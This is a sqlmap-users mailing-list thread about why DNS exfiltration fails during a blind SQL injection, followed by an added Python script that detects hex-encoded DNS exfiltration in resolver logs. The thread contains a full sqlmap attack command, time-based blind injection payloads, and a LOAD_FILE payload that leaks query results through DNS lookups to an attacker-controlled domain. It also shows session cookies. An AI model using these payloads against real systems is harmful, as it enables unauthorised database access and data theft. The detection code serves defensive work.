Re: [sqlmap-users] Problem with dns exfiltration
From: Miroslav S. <mir...@gm...> - 2014-01-23 19:25:21
Hi.

I am pretty sure that you are targeting a LAMP server, while DNS exfiltration against MySQL DBMS works only if the target is a Windows machine (LOAD_FILE is provided with a SMB path containing attacker's domain (prefixed with SQL query result as a subdomain) forcing DNS resolution).

Bye

On Jan 23, 2014 7:58 PM, "Chris Clements" <ccl...@ou...> wrote:

> Miroslav,
>
> Thanks for the reply. I was looking at my tcpdump wrong. The dns traffic
> I saw was from my sqlmap system itself looking up the target's dns name,
> not the target (or any other host) querying for records on my domain.
>
> So it seems that the target system isn't sending dns queries out.
> Anything else I can try, or am I just stuck with blind extraction here?
>
> Here's my sqlmap run and tcpdump if it helps:
>
> sqlmap
> ==================================
> root@Maple ~/s/g/sqlmap# ./sqlmap.py -u "https://ato.target.net/administrator/index.php?option=com_mcsearch&templateId=*/&view=searchtemplate" --random-agent --risk=3 --level=5 -a --dbms=mysql --threads=1 --predict-output --dns-domain=mydomain.net -v2 --banner --time-sec=10 --tamper=between --load-cookies=/root/cookies.txt
>
> sqlmap/1.0-dev-ab36e5a - automatic SQL injection and database takeover tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 13:07:01
>
> [13:07:01] [DEBUG] cleaning up configuration parameters
> [13:07:01] [INFO] setting up DNS server instance
> [13:07:01] [INFO] loading tamper script 'between'
> [13:07:01] [DEBUG] setting the HTTP timeout
> [13:07:01] [DEBUG] loading random HTTP User-Agent header(s) from file '/root/sectools/git/sqlmap/txt/user-agents.txt'
> [13:07:01] [INFO] fetched random HTTP User-Agent header from file '/root/sectools/git/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2
> [13:07:01] [DEBUG] setting the HTTP method to GET
> [13:07:01] [DEBUG] creating HTTP requests opener object
> [13:07:01] [INFO] loading cookies from '/root/cookies.txt'
> [13:07:01] [DEBUG] forcing back-end DBMS to user defined value
> custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q]
> [13:07:04] [INFO] testing connection to the target URL
> [13:07:05] [DEBUG] declared web page charset 'utf-8'
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Place: URI
> Parameter: #1*
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 OR time-based blind
>     Payload: https://ato.target.net:443/administrator/index.php?option=com_mcsearch&templateId=-5154OR 7979=SLEEP(10)-- MarC/&view=searchtemplate
>     Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
> ---
> [13:07:05] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
> [13:07:05] [INFO] testing MySQL
> [13:07:06] [WARNING] reflective value(s) found and filtering out
> [13:07:06] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
> [13:07:38] [INFO] confirming MySQL
> [13:07:38] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
> [13:08:20] [INFO] the back-end DBMS is MySQL
> [13:08:20] [INFO] fetching banner
> [13:08:20] [INFO] testing for data retrieval through DNS channel
> [13:08:20] [DEBUG] performed 1 queries in 0.88 seconds
> [13:08:20] [ERROR] data retrieval through DNS channel failed. Turning off DNS exfiltration support
> [13:08:20] [INFO] retrieved: 5.0.95-log
> [13:18:53] [DEBUG] performed 69 queries in 633.52 seconds
> web application technology: Apache
> back-end DBMS: MySQL >= 5.0.0
> banner: '5.0.95-log'
> ==================================
>
> tcpdump
> ==================================
> root@Maple ~# tcpdump -nvvi eth0 port 53
> tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
> 12:35:44.667201 IP (tos 0x0, ttl 64, id 22920, offset 0, flags [DF], proto UDP (17), length 66)
>     <sqlmap machine>.52795 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0xa7a3!] 61116+ A? ato.target.net. (38)
> 12:35:44.667229 IP (tos 0x0, ttl 64, id 22921, offset 0, flags [DF], proto UDP (17), length 66)
>     <sqlmap machine>.52795 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0x37e7!] 24158+ AAAA? ato.target.net. (38)
> 12:35:44.710564 IP (tos 0x0, ttl 45, id 824, offset 0, flags [none], proto UDP (17), length 151)
>     8.8.8.8.53 > <sqlmap machine>.52795: [udp sum ok] 24158 q: AAAA? ato.target.net. 0/1/0 ns: target.net. SOA ns-xxxx.awsdns-29.org. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 (123)
> 12:35:44.711455 IP (tos 0x0, ttl 45, id 22553, offset 0, flags [none], proto UDP (17), length 82)
>     8.8.8.8.53 > <sqlmap machine>.52795: [udp sum ok] 61116 q: A? ato.target.net. 1/0/0 ato.target.net. A XXX.XXX.XXX.172 (54)
> 12:35:44.716854 IP (tos 0x0, ttl 64, id 22922, offset 0, flags [DF], proto UDP (17), length 66)
>     <sqlmap machine>.58257 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0xa3b7!] 56658+ A? ato.target.net. (38)
> 12:35:44.716880 IP (tos 0x0, ttl 64, id 22923, offset 0, flags [DF], proto UDP (17), length 66)
>     <sqlmap machine>.58257 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0x6497!] 7256+ AAAA? ato.target.net. (38)
> 12:35:44.747848 IP (tos 0x0, ttl 45, id 22554, offset 0, flags [none], proto UDP (17), length 151)
>     8.8.8.8.53 > <sqlmap machine>.58257: [udp sum ok] 7256 q: AAAA? ato.target.net. 0/1/0 ns: target.net. SOA ns-xxxx.awsdns-29.org. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 (123)
> 12:35:44.763158 IP (tos 0x0, ttl 45, id 49299, offset 0, flags [none], proto UDP (17), length 82)
>     8.8.8.8.53 > <sqlmap machine>.58257: [udp sum ok] 56658 q: A? ato.target.net. 1/0/0 ato.target.net. A XXX.XXX.XXX.172 (54)
> ==================================
>
> Chris
>
> On Jan 23, 2014, at 1:42 AM, Miroslav Stampar <mir...@gm...> wrote:
>
> Hi Chris.
>
> It looks quite right. It would be tremendously helpful if you could send a console output and a tcpdump (you can limit to only port 53) for a following run:
>
> sudo python sqlmap.py -u "...." --flush-session --banner --dns-domain="..."
>
> From your given description it looks like everything should be up and running.
>
> Kind regards,
> Miroslav Stampar
>
> On Thu, Jan 23, 2014 at 12:46 AM, Chris Clements <ccl...@ou...> wrote:
>
>> Hey all,
>>
>> I've got a blind sqli that I'm exploiting with the latest sqlmap commit and am trying to get dns exfil to work, but am not having any luck.
>>
>> I start sqlmap as root with the --dns-domain option set to a domain that I control and have the sqlmap machine set as the authoritative NS for.
>> Running with a -v6, this is the info I get:
>>
>> ===============================================
>> [18:22:18] [INFO] testing for data retrieval through DNS channel
>> [18:22:18] [PAYLOAD] -2931 OR 7252=IF((ORD(MID((SELECT LOAD_FILE(CONCAT(0x5c5c5c5c4d776a2e,(SELECT HEX(MID((IFNULL(CAST(8315 AS CHAR),0x20)),1,31))),0x2e79564e2e73656375726566696c652e6e65745c5c7456414c))),6,1))>953),SLEEP(5),7252)-- PyBa
>> [18:22:18] [TRAFFIC OUT] HTTP request [#3]:
>> GET /administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate HTTP/1.1
>> Accept-language: en-us,en;q=0.5
>> Accept-encoding: gzip,deflate
>> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>> User-agent: Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.1) Gecko/2008071719 Firefox/3.0.1
>> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>>
>> Pragma: no-cache
>> Cache-control: no-cache,no-store
>> Cookie: Login=1;activeProfile=16469185;serviceID=1320;91370904fbecd1edf649755d657f5d32=97t8br06sreu9r846bai0t2pj0;mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec
>> Connection: close
>>
>> [18:22:19] [TRAFFIC IN] HTTP response [#3] (200 OK):
>> Content-length: 8627
>> Content-encoding: gzip
>> Set-cookie: serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; path=/; httponly, serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; path=/; httponly, mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec; expires=Thu, 22-Jan-2015 23:22:20 GMT; path=/; httponly
>> Expires: Mon, 1 Jan 2001 00:00:00 GMT
>> Vary: Accept-Encoding
>> Uri: https://target.net:443/administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate
>> Server: Apache
>> Last-modified: Wed, 22 Jan 2014 23:22:20 GMT
>> Connection: close
>> Pragma: no-cache
>> Cache-control: post-check=0, pre-check=0
>> Date: Wed, 22 Jan 2014 23:22:20 GMT
>> P3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
>> Content-type: text/html; charset=utf-8
>>
>> [18:22:19] [DEBUG] performed 1 queries in 0.51 seconds
>> [18:22:19] [ERROR] data retrieval through DNS channel failed. Turning off DNS exfiltration support
>> ===============================================
>>
>> If I run a tcpdump on the sqlmap machine, I see dns requests come in for "target.net" and if I do manual dns queries to the domain I own, sqlmap responds as expected with localhost.domain.com.
>>
>> Any idea? Am I doing anything wrong?
>>
>> Chris
>>
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
> --
> Miroslav Stampar
> http://about.me/stamparm
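The mechanism described in the reply (the query result is HEX-encoded into a subdomain label of a domain the attacker controls, and the database server resolves that name because LOAD_FILE is handed a UNC path) leaves a recognisable trace on the resolver side: a label made only of hex digits, much longer than ordinary hostnames. The following is an added example for the defending side, not code from this thread or from sqlmap. It scans constructed BIND-style query log lines for such labels, decodes them so an analyst can see what value left the network, and skips an allow-list of zones where hex-looking labels are normal. The log format, client addresses, the `exfil-example.net` and `cdn-example.org` zones, the length threshold and the allow-list are all assumptions; the 20-character hex label in the sample is the banner value retrieved in the thread, '5.0.95-log', encoded the way HEX() would.

```python
import re

# Constructed BIND-style "queries" log lines (assumption: this is not real
# traffic). Client addresses and zones are made up; the 20-character hex label
# on the second line is HEX('5.0.95-log'), the banner value seen in the thread.
SAMPLE_QUERY_LOG = """\
23-Jan-2014 13:08:20.101 client 203.0.113.7#53123: query: www.example.net IN A + (192.0.2.1)
23-Jan-2014 13:08:20.544 client 203.0.113.9#41011: query: Mwj.352e302e39352d6c6f67.yVN.exfil-example.net IN A + (192.0.2.1)
23-Jan-2014 13:08:21.002 client 203.0.113.9#41012: query: mail.exfil-example.net IN MX + (192.0.2.1)
23-Jan-2014 13:08:21.310 client 203.0.113.9#41013: query: deadbeefcafef00d.exfil-example.net IN A + (192.0.2.1)
23-Jan-2014 13:08:22.005 client 203.0.113.7#53124: query: 9f86d081884c7d65.cdn-example.org IN A + (192.0.2.1)
"""

# Fields needed from each log line: source client, queried name, query type.
LOG_RE = re.compile(r"client (?P<client>[\d.:a-fA-F]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)")
HEX_LABEL_RE = re.compile(r"^[0-9a-fA-F]+$")

# Assumption: hex labels shorter than this are too common in legitimate names
# (CDN hashes, cache busters) to be worth an alert on their own. Tune per site.
MIN_HEX_LABEL = 16

# Constructed allow-list: zones where hex-looking labels are expected.
ALLOWED_ZONES = {"cdn-example.org"}


def parse_query_log(text):
    """Turn raw log lines into client/qname/qtype records; unparsable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m:
            events.append({"client": m.group("client"),
                           "qname": m.group("qname").rstrip(".").lower(),
                           "qtype": m.group("qtype")})
    return events


def in_allowed_zone(qname):
    """True when the name is, or is under, an allow-listed zone."""
    return any(qname == z or qname.endswith("." + z) for z in ALLOWED_ZONES)


def hex_labels(qname):
    """Labels made solely of hex digits, even-length (whole bytes) and at least MIN_HEX_LABEL long."""
    return [lab for lab in qname.split(".")
            if len(lab) >= MIN_HEX_LABEL and len(lab) % 2 == 0 and HEX_LABEL_RE.match(lab)]


def decode_label(label):
    """Decode a hex label; return the text if it is printable ASCII, otherwise None."""
    raw = bytes.fromhex(label)
    if raw and all(32 <= b < 127 for b in raw):
        return raw.decode("ascii")
    return None


def find_exfil_candidates(text):
    """One finding per suspicious hex label seen in the log, in log order."""
    findings = []
    for ev in parse_query_log(text):
        if in_allowed_zone(ev["qname"]):
            continue
        for label in hex_labels(ev["qname"]):
            findings.append({"client": ev["client"], "qname": ev["qname"],
                             "hex": label, "decoded": decode_label(label)})
    return findings


def summarize_by_client(findings):
    """Group decoded values by the client that issued the lookups, preserving order.
    Labels that do not decode to printable text are kept as <hex> so nothing is lost."""
    summary = {}
    for f in findings:
        shown = f["decoded"] if f["decoded"] is not None else "<" + f["hex"] + ">"
        summary.setdefault(f["client"], []).append(shown)
    return summary


if __name__ == "__main__":
    found = find_exfil_candidates(SAMPLE_QUERY_LOG)
    for f in found:
        print(f"{f['client']} asked for {f['qname']}: hex label {f['hex']!r} -> {f['decoded']!r}")
    print(summarize_by_client(found))
```

Two points follow from the thread itself. First, the only queries Chris captured came from his own sqlmap host resolving the target's name, which is exactly why the scan keys on the client address: the interesting record is a lookup issued by the database server, not by the tester. Second, the reply explains that a Linux-hosted MySQL never issues this lookup at all, so a clean resolver log says nothing about whether the injection exists; it only tells you the DNS side channel was not used.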